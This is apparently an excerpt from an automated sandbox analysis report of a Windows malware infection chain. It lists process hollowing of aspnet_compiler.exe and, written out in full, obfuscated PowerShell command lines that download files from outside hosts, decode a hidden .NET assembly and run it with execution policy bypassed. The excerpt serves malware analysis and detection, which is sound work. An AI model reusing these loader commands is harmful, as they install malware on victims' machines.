                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040317B mov eax, dword ptr fs:[00000030h]13_2_0040317B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402B7C GetProcessHeap,RtlAllocateHeap,13_2_00402B7C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi32_5820.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 10BA008Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhbmwhrricagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc10evblicagicagicagicagicagicagicagicagicagicagicaglw1lbujlcmrlrmlusvrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpua1putfpuz1rclhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiezrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigxeqyx1aw50icagicagicagicagicagicagicagicagicagicagicagsgfwt1l2awhjleludfb0ciagicagicagicagicagicagicagicagicagicagicagie5qumnkq2pxktsnicagicagicagicagicagicagicagicagicagicagicaglu5htwugicagicagicagicagicagicagicagicagicagicagicait3jjwur2usigicagicagicagicagicagicagicagicagicagicagicattkftzxnwqwnficagicagicagicagicagicagicagicagicagicagicaguejvc0ltuiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakcgzydfe6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmzl3nlzw15ymvzdhroaw5nc3doawnoy2fsbhlvdwjhynlnaxjsd2hpy2hnaxzldwhvdgnoawnrcy50suyilcikrw5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2hpy2hjywxsew91ymfiewdpcmx3agljagdpdmv1ac52ylmildasmck7u3rbunqtu0xlrvaomyk7suvyicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agljagnhbgx5b3viywj5z2lybhdoawnoz2l2zxvolnziuyi='+[char]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'awvyicggkcgnm1peaw1hz2vvcmwgpsbjdwfodhrwczovlzewmtcuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawxla2v5ptjbyv9iv285umv1ndv0n0jvmwtwz3nkoxbuoxbnu1nsdln0r3juveldzkzobvqnkydljysnajnmqzztuxrjy09jx1qznxcmcgtfdmlkpwzkngy2mtqnkydiyjiwjysnowm2mmmxnzmwjysnotq1mtc2yta5mccrjzrmiel1jysnytszwkr3zwjdbccrj2llbnqgpsbozxctt2jqzwn0ifn5cycrj3rlbs5ojysnzxquv2viq2xpzw50oznargltywdlqnl0zxmgpsazwkr3zwjdbgllbnqurg93bmxvywreyxrhkdnargltywdlvxjsktszwkrpbwfnzvrlehqgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkcnkydldfn0cmluzycrjygzwkrpbwfnzuj5dgvzktszwkrzdgfydezsjysnywcgpsbjdwe8pejbu0u2nf9tvefsvd4+sxvhoznargvuzezsywcgpsbjdwe8pejbu0u2nf9ftkq+pkl1jysnytszwkrzdgfydeluzgv4id0gm1peaw1hz2unkyduzxh0lkluzgv4t2yom1pec3rhcnrgbgfnktszwkrlbmrjbmrleca9idnargltywdlvgv4dc5jbmrlee9mkdnargvuzezsjysnywcpoznarhn0yxj0sw5kzxgglwdlidaglwfuzcazwkrlbmrjbmrlecatz3qgm1pec3rhcnrjbmrledszwkrzdgfydeluzgv4ics9idnarhn0yxj0rmxhzy5mzw5ndgg7m1peymfzzty0tgvuz3roid0gm1onkydezw5ksw5kzxgglsazwkrzdgfydeluzgv4jysnoznajysnrgjhc2u2jysnnenvbw1hbmqgpsazwkrpbwfnzvrlehquu3vic3ryaw5nkdnarhn0yxj0sw5kzxgsidnarginkydhc2u2nexlbmcnkyd0ack7m1peymfzzty0umv2zxjzzwqgpsatam9pbiaom1peymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpihp3dibgb3jfywnolu9iamvjdcb7idnarf8gjysnfslblscrjzeuli0om1peymfzzty0q29tbwfuzc5mzw5ndccrj2gpxtszwkrjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkdnargjhc2u2nfjldmvyc2unkydkktszwkrsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgunkydjdglvbi5bc3nlbwjsev06okxvywqom1pey29tbwfuzej5dgunkydzktszwkr2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzscrj10ur2v0twv0ag9kkel1yvzbsul1ysk7jysnm1pedmfptwv0ag9klkludm9rzsgzwkrudwxslcbakel1yxr4dc5ltedptc8zmy82mzeumzqyljmumjkxly86cccrj3r0ael1yscrjywgsxvhzccrj2vzyxrpdmfkb0l1yswgsxvhzgvzyxrpdmfkb0l1yswgsxvhzgvzyxrpdicrj2fkb0l1yswgsxvhyxnwbmv0x2nvbxbpbgvysxvhlcbjdwfkzxnhdgknkyd2ywrvsxvhlcbjdwfkzxnhdgl2ywrvsxvhlel1jysnywrlc2f0axzhzg9jdwessxvhzgvzyxrpdmfkb0l1ysxjdwfkzxnhdgl2ywrvsxunkydhlel1ywrlc2f0axzhzg9jdscrj2essxvhzgvzyxrpdmfkb0l1ysxjjysndwexsxvhlel1ywrlc2f0axzhzg9jdwepjysnktsnksaglunszxbsywnlkftdaefyxtczk1tdaefyxtexnytbq2hbcl05nyksw0noqxjdmzkglunszxbsywnlkftdaefyxtuxk1tdaefyxtkwk1tdaefyxty4ksxbq2hbcl0zni1dumvwbgfjzsagkftdaefyxteymitbq2hbcl0xmtkrw0noqxjdmte4ksxbq2hbcl0xmjqpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('3zdimageurl = iuahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt'+'k'+'j3lc6sqticoc_t35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f iu'+'a;3zdwebcl'+'ient = new-object sys'+'tem.n'+'et.webclient;3zdimagebytes = 3zdwebclient.downloaddata(3zdimageurl);3zdimagetext = [system.text.encoding]::utf8.g'+'etstring'+'(3zdimagebytes);3zdstartfl'+'ag = iua<<base64_start>>iua;3zdendflag = iua<<base64_end>>iu'+'a;3zdstartindex = 3zdimage'+'text.indexof(3zdstartflag);3zdendindex = 3zdimagetext.indexof(3zdendfl'+'ag);3zdstartindex -ge 0 -and 3zdendindex -gt 3zdstartindex;3zdstartindex += 3zdstartflag.length;3zdbase64length = 3z'+'dendindex - 3zdstartindex'+';3z'+'dbase6'+'4command = 3zdimagetext.substring(3zdstartindex, 3zdb'+'ase64leng'+'th);3zdbase64reversed = -join (3zdbase64command.tochararray() zwv foreach-object { 3zd_ '+'})[-'+'1..-(3zdbase64command.lengt'+'h)];3zdcommandbytes = [system.convert]::frombase64string(3zdbase64reverse'+'d);3zdloadedassembly = [system.refle'+'ction.assembly]::load(3zdcommandbyte'+'s);3zdvaimethod = [dnlib.io.home'+'].getmethod(iuavaiiua);'+'3zdvaimethod.invoke(3zdnull, @(iuatxt.klgol/33/631.342.3.291//:p'+'tthiua'+', iuad'+'esativadoiua, iuadesativadoiua, iuadesativ'+'adoiua, iuaaspnet_compileriua, iuadesati'+'vadoiua, iuadesativadoiua,iu'+'adesativadoiua,iuadesativadoiua,iuadesativadoiu'+'a,iuadesativadoiu'+'a,iuadesativadoiua,i'+'ua1iua,iuadesativadoiua)'+');') -creplace([char]73+[char]117+[char]97),[char]39 -creplace([char]51+[char]90+[char]68),[char]36-creplace ([char]122+[char]119+[char]118),[char]124))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhbmwhrricagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc10evblicagicagicagicagicagicagicagicagicagicagicaglw1lbujlcmrlrmlusvrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpua1putfpuz1rclhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiezrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigxeqyx1aw50icagicagicagicagicagicagicagicagicagicagicagsgfwt1l2awhjleludfb0ciagicagicagicagicagicagicagicagicagicagicagie5qumnkq2pxktsnicagicagicagicagicagicagicagicagicagicagicaglu5htwugicagicagicagicagicagicagicagicagicagicagicait3jjwur2usigicagicagicagicagicagicagicagicagicagicagicattkftzxnwqwnficagicagicagicagicagicagicagicagicagicagicaguejvc0ltuiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakcgzydfe6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmzl3nlzw15ymvzdhroaw5nc3doawnoy2fsbhlvdwjhynlnaxjsd2hpy2hnaxzldwhvdgnoawnrcy50suyilcikrw5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2hpy2hjywxsew91ymfiewdpcmx3agljagdpdmv1ac52ylmildasmck7u3rbunqtu0xlrvaomyk7suvyicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agljagnhbgx5b3viywj5z2lybhdoawnoz2l2zxvolnziuyi='+[char]34+'))')))"Jump to behavior
